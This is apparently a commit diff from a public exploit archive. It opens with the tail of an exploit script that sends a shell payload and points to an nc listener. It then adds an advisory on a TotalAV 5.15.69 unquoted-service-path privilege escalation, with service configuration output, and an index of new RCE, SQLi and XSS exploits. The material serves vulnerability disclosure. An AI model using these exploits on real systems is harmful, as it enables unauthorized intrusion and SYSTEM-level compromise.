print("[+] W00t W00t Sending Shell :) !!!")
stager = request.post(audit_url,exploit_fields)
if stager.status_code==200:
print("[+] Check nc listener!")
else:
print("Something Went Wrong or Not Vulnerable :(")

60
exploits/windows/local/50314.txt Normal file
View file

@ -0,0 +1,60 @@
# Exploit Title: TotalAV 5.15.69 - Unquoted Service Path
# Date: 22/09/2021
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://www.totalav.com
# Software Link: https://download.totalav.com/windows/beta-trial or https://install.protected.net/windows/cdn3/5.15.69/TotalAV.exe
# Version: 5.15.69
# Tested on: Windows 10 Pro 20H2 and 21H1 x64
The PC Security Management Service, PC Security Management Monitoring Service, and Anti-Malware SDK Protected Service
services from TotalAV version 5.15.69 are affected by unquoted service path (CWE-428) vulnerability which may allow a
user to gain SYSTEM privileges since they all running with higher privileges. To exploit the vulnerability is possible
to place executable(s) following the path of the unquoted string.
Affected excecutables services: SecurityService, SecurityServiceMonitor, AMSProtectedService:
PC Security Management Service SecurityService C:\Program Files (x86)\TotalAV\SecurityService.exe Auto
PC Security Management Monitoring Service SecurityServiceMonitor C:\Program Files (x86)\TotalAV\SecurityService.exe --monitor Auto
Anti-Malware SDK Protected Service AMSProtectedService C:\Program Files (x86)\TotalAV\savapi\elam_ppl\amsprotectedservice.exe Auto
C:\Users\user>sc qc SecurityService
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: SecurityService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : C:\Program Files(x86)\TotalAV\SecurityService.exe
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : PC Security Management Service
DIPENDENZE :
SERVICE_START_NAME : LocalSystem
C:\Users\user>sc qc SecurityServiceMonitor
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: SecurityServiceMonitor
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : C:\Program Files(x86)\TotalAV\SecurityService.exe --monitor
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : PC Security Management Monitoring Service
DIPENDENZE :
SERVICE_START_NAME : LocalSystem
C:\Users\user>sc qc AMSProtectedService
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: AMSProtectedService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : C:\Program Files (x86)\TotalAV\savapi\elam_ppl\amsprotectedservice.exe
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : Anti-Malware SDK Protected Service
DIPENDENZE :
SERVICE_START_NAME : LocalSystem

8
files_exploits.csv
View file

@ -9791,6 +9791,7 @@ id,file,description,date,author,type,platform,port
35902,exploits/windows/local/35902.txt,"VideoLAN VLC Media Player 2.1.5 - Write Access Violation",1970-01-01,"Veysel HATAS",local,windows,
35905,exploits/windows/local/35905.c,"Comodo Backup 4.4.0.0 - Null Pointer Dereference Privilege Escalation",1970-01-01,"Parvez Anwar",local,windows,
35983,exploits/windows/local/35983.rb,"Microsoft Remote Desktop Services - Web Proxy IE Sandbox Escape (MS15-004) (Metasploit)",1970-01-01,Metasploit,local,windows,
50314,exploits/windows/local/50314.txt,"TotalAV 5.15.69 - Unquoted Service Path",1970-01-01,"Andrea Intilangelo",local,windows,
35934,exploits/osx/local/35934.txt,"Apple Mac OSX < 10.10.x - GateKeeper Bypass",1970-01-01,"Amplia Security Research",local,osx,
35936,exploits/windows/local/35936.py,"Microsoft Windows Server 2003 SP2 - Local Privilege Escalation (MS14-070)",1970-01-01,KoreLogic,local,windows,
35953,exploits/windows/local/35953.c,"McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation",1970-01-01,"Parvez Anwar",local,windows,
@ -37146,6 +37147,8 @@ id,file,description,date,author,type,platform,port
35929,exploits/php/webapps/35929.txt,"Joomla! Component com_voj - SQL Injection",1970-01-01,CoBRa_21,webapps,php,
35930,exploits/php/webapps/35930.txt,"Prontus CMS - 'page' Cross-Site Scripting",1970-01-01,Zerial,webapps,php,
35931,exploits/php/webapps/35931.txt,"ICMusic 1.2 - 'music_id' SQL Injection",1970-01-01,kaMtiEz,webapps,php,
50312,exploits/php/webapps/50312.txt,"Simple Attendance System 1.0 - Unauthenticated Blind SQLi",1970-01-01,"()t/\\/\\1",webapps,php,
50313,exploits/php/webapps/50313.py,"Filerun 2021.03.26 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"syntegris information solutions GmbH",webapps,php,
35933,exploits/hardware/webapps/35933.txt,"ManageEngine Firewall Analyzer 8.0 - Directory Traversal / Cross-Site Scripting",1970-01-01,"Ertebat Gostar Co",webapps,hardware,
35940,exploits/php/webapps/35940.txt,"Sphider 1.3.x - Admin Panel Multiple SQL Injections",1970-01-01,"Karthik R",webapps,php,
35941,exploits/multiple/webapps/35941.txt,"Flowplayer 3.2.7 - 'linkUrl' Cross-Site Scripting",1970-01-01,"Szymon Gruszecki",webapps,multiple,
@ -44428,3 +44431,8 @@ id,file,description,date,author,type,platform,port
50307,exploits/php/webapps/50307.txt,"Budget and Expense Tracker System 1.0 - Authenticated Bypass",1970-01-01,"Prunier Charles-Yves",webapps,php,
50308,exploits/php/webapps/50308.txt,"Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php,
50310,exploits/php/webapps/50310.py,"WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,
50315,exploits/php/webapps/50315.py,"e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,
50316,exploits/php/webapps/50316.py,"OpenCats 0.9.4-2 - 'docx ' XML External Entity Injection (XXE)",1970-01-01,"Jake Ruston",webapps,php,
50317,exploits/multiple/webapps/50317.txt,"Cloudron 6.2 - 'returnTo ' Cross Site Scripting (Reflected)",1970-01-01,"Akıner Kısa",webapps,multiple,
50318,exploits/python/webapps/50318.py,"Sentry 8.2.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Mohin Paramasivam",webapps,python,
50319,exploits/php/webapps/50319.py,"Online Reviewer System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php,

Can't render this file because it is too large.